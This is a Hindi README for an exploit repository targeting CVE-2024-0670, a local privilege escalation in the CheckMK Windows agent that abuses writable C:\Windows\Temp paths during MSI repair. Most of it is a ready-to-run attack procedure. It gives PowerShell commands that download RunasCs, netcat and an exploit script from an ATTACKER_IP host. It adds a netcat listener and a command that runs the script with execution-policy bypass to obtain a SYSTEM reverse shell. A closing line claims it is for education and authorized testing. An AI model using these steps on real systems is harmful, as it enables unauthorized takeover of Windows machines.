
यह रिपॉज़िटरी CVE-2024-0670 के लिए एक एक्सप्लॉइट प्रदर्शन प्रस्तुत करती है, जो Windows के लिए CheckMK Agent को प्रभावित करने वाली एक स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) भेद्यता है। यह भेद्यता एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता को MSI मरम्मत तंत्र द्वारा संसाधित लिखने योग्य फ़ाइल पथों का दुरुपयोग करके SYSTEM विशेषाधिकार प्राप्त करने की अनुमति देती है।
इस रिपॉजिटरी में CVE-2024-0670 के लिए एक सरल और स्वच्छ प्रूफ-ऑफ-कॉन्सेप्ट है, जो CheckMK विंडोज एजेंट में एक लोकल प्रिविलेज एस्केलेशन भेद्यता है। कम-विशेषाधिकार वाला उपयोगकर्ता MSI मरम्मत के दौरान निष्पादित लिखने योग्य अस्थायी फ़ाइल पथों का दुरुपयोग करके SYSTEM विशेषाधिकार प्राप्त कर सकता है।
MSI मरम्मत के दौरान, CheckMK निम्नलिखित के अंतर्गत फ़ाइलें निष्पादित करता है:
C:\Windows\Temp\
यदि कोई सामान्य उपयोगकर्ता अनुमानित नामों के साथ वहां फ़ाइलें रख सकता है, तो वे NT AUTHORITY\SYSTEM के रूप में कमांड निष्पादित कर सकते हैं।
यह एक्सप्लॉइट कई पेलोड फ़ाइलनाम सीड करता है और SYSTEM निष्पादन प्राप्त करने के लिए MSI मरम्मत को ट्रिगर करता है।
RunasCs.exe → runas रिप्लेसमेंट (प्लेनटेक्स्ट पासवर्ड सपोर्ट)
nc.exe → Netcat (रिवर्स शेल)
exploit.ps1 → CVE-2024-0670 एक्सप्लॉइट स्क्रिप्ट
README.md → दस्तावेज़ीकरण
C:\Windows\Temp\
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1
अपनी मशीन पर एक लिसनर प्रारंभ करें:
nc -lvnp 1111
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"
सफल होने पर, आपको एक SYSTEM रिवर्स शेल प्राप्त होगा।
net4:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs
net2:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs
यह प्रोजेक्ट केवल शैक्षिक और अधिकृत पेनेट्रेशन टेस्टिंग के लिए है। इसे अवैध उद्देश्यों के लिए उपयोग न करें। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है।